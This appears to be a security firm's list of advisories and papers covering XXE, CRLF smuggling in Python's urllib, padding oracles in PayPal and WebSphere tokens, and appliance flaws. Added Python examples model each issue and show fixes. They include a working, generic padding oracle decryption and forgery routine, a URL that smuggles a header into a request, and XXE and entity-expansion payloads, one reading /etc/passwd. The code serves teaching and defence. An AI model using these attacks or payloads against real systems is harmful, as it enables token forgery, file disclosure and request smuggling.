Java and Python both ship URL-handling code that can be leveraged in XML external entity (XXE) injection and SSRF attacks.
Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme.
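The injection described above, modelled in an added example (this is not urllib's own code and not VSR's proof of concept): a request builder that percent-decodes the host component and splices it into the request stream, beside a hardened builder that refuses control characters. The URL, the hostname example.test and the X-Injected header are constructed for the demonstration; the parse_request function shows what a server on the other end would read.

```python
import urllib.parse

class ProtocolInjection(ValueError):
    """Raised when URL-derived data would break out of the HTTP request stream."""

def build_request(url, strict):
    """Build the raw bytes of a GET request for `url`.

    Constructed model of the bug, not urllib's own code: the host component is
    percent-decoded and spliced straight into the request, so an encoded
    %0d%0a in the host becomes a real CR LF inside the request stream and
    everything after it is read by the server as further header lines (or,
    after a blank line, as a second request).  With strict=True any control
    character in the decoded host or target is rejected before the request is
    built.  Note that urlsplit() itself (3.9.5+) strips raw tab/CR/LF from the
    URL string, which is why the payload has to arrive percent-encoded."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme != "http":
        raise ValueError("only the http scheme is modelled here")
    host = urllib.parse.unquote(parts.netloc)      # the unsafe decode step
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    if strict:
        for field, value in (("host", host), ("target", target)):
            if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
                raise ProtocolInjection("control character in %s: %r" % (field, value))
    return ("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n" % (target, host)).encode("latin-1")

def parse_request(raw):
    """Server-side view: (request_line, {header: value}) for the first request
    in `raw`, so the effect of the injected bytes is visible."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers

# Constructed attacker-controlled URL: a percent-encoded CR LF in the host
# followed by a header the attacker wants the server to see.
INJECTED_URL = "http://example.test%0d%0aX-Injected:%20yes/index"

if __name__ == "__main__":
    raw = build_request(INJECTED_URL, strict=False)
    print(raw)
    print(parse_request(raw))
    try:
        build_request(INJECTED_URL, strict=True)
    except ProtocolInjection as exc:
        print("hardened builder refused:", exc)
```

The hardened check is deliberately placed after decoding: validating the percent-encoded form would pass the payload through, because the dangerous bytes only appear once unquote() has run.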
The eXtensible Markup Language (XML) is an extremely pervasive technology used in countless software projects. A core feature of XML is the ability to define and validate document structure using schemas and document type definitions (DTDs). When used incorrectly, certain aspects of these document definition and validation features can lead to security vulnerabilities in applications that use XML. This document attempts to provide an up-to-date reference on these attacks, enumerating all publicly known techniques applicable to the most popular XML parsers in use while exploring a few novel attacks as well.
The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is produced by a 64-bit block cipher in CBC mode with no independent integrity protection (such as a MAC). Lacking that protection, the aksession cookie is exposed to a padding oracle attack allowing full decryption and forgery of the cookie.
In February 2013, VSR identified a vulnerability in the IBM WebSphere Commerce framework which could allow an attacker to tamper with values stored in the "krypto" URL parameter. This parameter is encrypted with a block cipher without any independent integrity protection. This, combined with observed application behavior, allows for padding oracle attacks which can be used to decrypt the krypto token and forge new tokens with arbitrary embedded parameters.
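The padding oracle attack behind both the aksession and the krypto advisories, as an added worked example (not VSR's tooling and not PayPal's or IBM's cipher). The 64-bit Feistel cipher, the TokenServer class and the token contents are constructed stand-ins; the attack itself never looks inside the cipher and uses only the server's yes/no padding check, which is exactly why CBC without integrity protection is broken regardless of the cipher behind it.

```python
import hashlib
import os

BLOCK = 8  # 64-bit block cipher, as in the advisories

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 64-bit Feistel cipher (constructed stand-in; the attack only needs the
# server's padding check, not the cipher).
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def block_encrypt(key, blk):
    left, right = blk[:4], blk[4:]
    for rnd in range(8):
        left, right = right, _xor(left, _f(key, rnd, right))
    return right + left

def block_decrypt(key, blk):
    right, left = blk[:4], blk[4:]
    for rnd in reversed(range(8)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right

def pad(data):                       # PKCS#7-style padding
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):    # returns iv || C1 || ... || Cn
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)

def cbc_decrypt(key, ct):
    pt, prev = [], ct[:BLOCK]
    for i in range(BLOCK, len(ct), BLOCK):
        pt.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return unpad(b"".join(pt))

class TokenServer:
    """Issues CBC-encrypted tokens with no MAC and leaks whether the padding
    was valid: the aksession / krypto situation in miniature (constructed)."""
    def __init__(self):
        self.key = os.urandom(16)
    def issue(self, plaintext):
        return cbc_encrypt(self.key, os.urandom(BLOCK), pad(plaintext))
    def decrypt(self, token):
        return cbc_decrypt(self.key, token)
    def padding_ok(self, token):     # the oracle the attacker gets to query
        try:
            self.decrypt(token)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, blk):
    """Return D_k(blk), the raw block-cipher decryption of one ciphertext
    block, using at most 8*256 oracle queries with crafted predecessor blocks."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        for guess in range(256):
            probe = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                probe[j] = inter[j] ^ padval   # force already-known bytes to padval
            probe[pos] = guess
            if not oracle(bytes(probe) + blk):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be a longer padding by accident;
                # disturbing the byte before it must keep a genuine \x01 valid.
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + blk):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("no guess accepted at byte %d" % pos)
    return bytes(inter)

def oracle_decrypt(oracle, token):
    """Full decryption: P_i = D_k(C_i) XOR C_{i-1}, with C_0 the IV."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    pt = b"".join(_xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1])
                  for i in range(1, len(blocks)))
    return unpad(pt)

def oracle_forge(oracle, plaintext):
    """Forgery without the key: pick the last ciphertext block freely, then work
    backwards choosing C_{i-1} = D_k(C_i) XOR P_i for each wanted block."""
    padded = pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    current = bytes(BLOCK)           # arbitrary final block
    out = [current]
    for want in reversed(blocks):
        current = _xor(recover_intermediate(oracle, current), want)
        out.insert(0, current)
    return b"".join(out)
```

Decryption costs at most 2048 oracle queries per 8-byte block (1024 on average), and forgery the same per block of chosen plaintext; the only fix is to authenticate the ciphertext (or use an AEAD mode) and to make the padding check's outcome unobservable.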
VSR identified a vulnerability in multiple open source office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe interpretation of XML files with custom entity declarations. Deeper analysis revealed that the vulnerability was caused by acceptance of external entities by the libraptor library, which is used by librdf and is in turn used by these office products.
An XML External Entity (XXE) attack is possible in OpenOffice.org versions 3.3 and 3.4 Beta. This vulnerability exploits the way in which external entities are processed in certain XML components of ODF documents.
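An added example of the defensive side of the XXE material above (the XML parser reference, and the libraptor and OpenOffice.org entries): a hardened parser built on Python's standard-library expat binding that refuses DOCTYPE declarations, entity declarations and external entity references, run over three constructed documents. This is illustration code, not the paper's test suite and not the office products' or libraptor's parser.

```python
import xml.parsers.expat as expat

class UnsafeXML(ValueError):
    """Raised when a document uses DTD features this parser refuses to process."""

def hardened_parse(data):
    """Parse `data` (bytes) and return (root_tag, element_count, text) while
    refusing DOCTYPE declarations, entity declarations and external entity
    references.  Refusing the whole DTD is the simplest defence: it removes
    external entities (local file disclosure, SSRF) and nested internal
    entities (entity-expansion denial of service) in one stroke."""
    parser = expat.ParserCreate()
    # Never load an external DTD subset or expand parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE refused (name=%r, system id=%r)" % (name, sysid))

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML("entity declaration refused: %r" % name)

    def reject_external(context, base, sysid, pubid):
        raise UnsafeXML("external entity reference refused: %r" % sysid)

    state = {"root": None, "elements": 0, "text": []}

    def start(tag, attrs):
        if state["root"] is None:
            state["root"] = tag
        state["elements"] += 1

    # Exceptions raised inside expat callbacks propagate out of Parse().
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.CharacterDataHandler = state["text"].append
    parser.Parse(data, True)
    return state["root"], state["elements"], "".join(state["text"]).strip()

def classify(doc):
    """'accepted' or 'refused' for a document, for quick triage of a corpus."""
    try:
        hardened_parse(doc)
        return "accepted"
    except UnsafeXML:
        return "refused"

# Constructed sample documents.
BENIGN = b'<?xml version="1.0"?><order><item sku="A1">widget</item></order>'
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b'<order><item>&xxe;</item></order>')
LAUGHS = (b'<?xml version="1.0"?>'
          b'<!DOCTYPE lolz [<!ENTITY lol "lol">'
          b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
          b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
          b']><lolz>&lol3;</lolz>')

if __name__ == "__main__":
    print(hardened_parse(BENIGN))
    for name, doc in (("xxe", XXE), ("laughs", LAUGHS)):
        print(name, classify(doc))
```

If an application genuinely needs DOCTYPE (some ODF and DocBook tooling does), keep only the DOCTYPE handler permissive and leave the entity-declaration and external-reference handlers raising; that still blocks both the file-disclosure and the expansion cases.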
RegLookup is a small command line utility for parsing and searching registry files from Windows NT and later.
Virtual Security Research, LLC. Security Advisory - Over the last several years, VSR analysts had observed unusual behavior in multiple WebLogic deployments when certain special characters were URL-encoded and appended to URLs. In late April 2010, VSR began researching this in more depth and found that the issue could allow for HTTP header injection and HTTP request smuggling attacks.
Virtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical.
Virtual Security Research, LLC. Security Advisory - On December 3rd, VSR identified a directory traversal and file retrieval vulnerability in TANDBERG's Video Communication Server. This issue would allow an authenticated attacker (with access as an administrator or a less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the "nobody" system user.
Virtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified an SSH service authentication weakness in TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances.
Virtual Security Research, LLC. Security Advisory - In mid-January, VSR identified a vulnerability in Google Chrome which could be used in phishing attacks against specific types of web sites. This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site.
Whitepaper called Weaning The Web Off Of Session Cookies. It compares the security weaknesses and usability limitations of cookie-based session management with those of HTTP digest authentication, and argues that digest authentication is clearly the more secure system in practice.
VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site.
Virtual Security Research, LLC. Security Advisory - Multiple buffer overflows exist in AFFLIB version 2.2.0. Earlier versions may also be affected.
Virtual Security Research, LLC. Security Advisory - A time-of-check/time-of-use (TOCTOU) file race condition exists in AFFLIB versions 2.2.0 through 2.2.8.
Virtual Security Research, LLC. Security Advisory - Multiple shell metacharacter injection vulnerabilities exist in AFFLIB versions 2.2.0 through 2.2.8.
Virtual Security Research, LLC. Security Advisory - Multiple format string injection vulnerabilities exist in AFFLIB versions 2.2.0 through 2.2.8.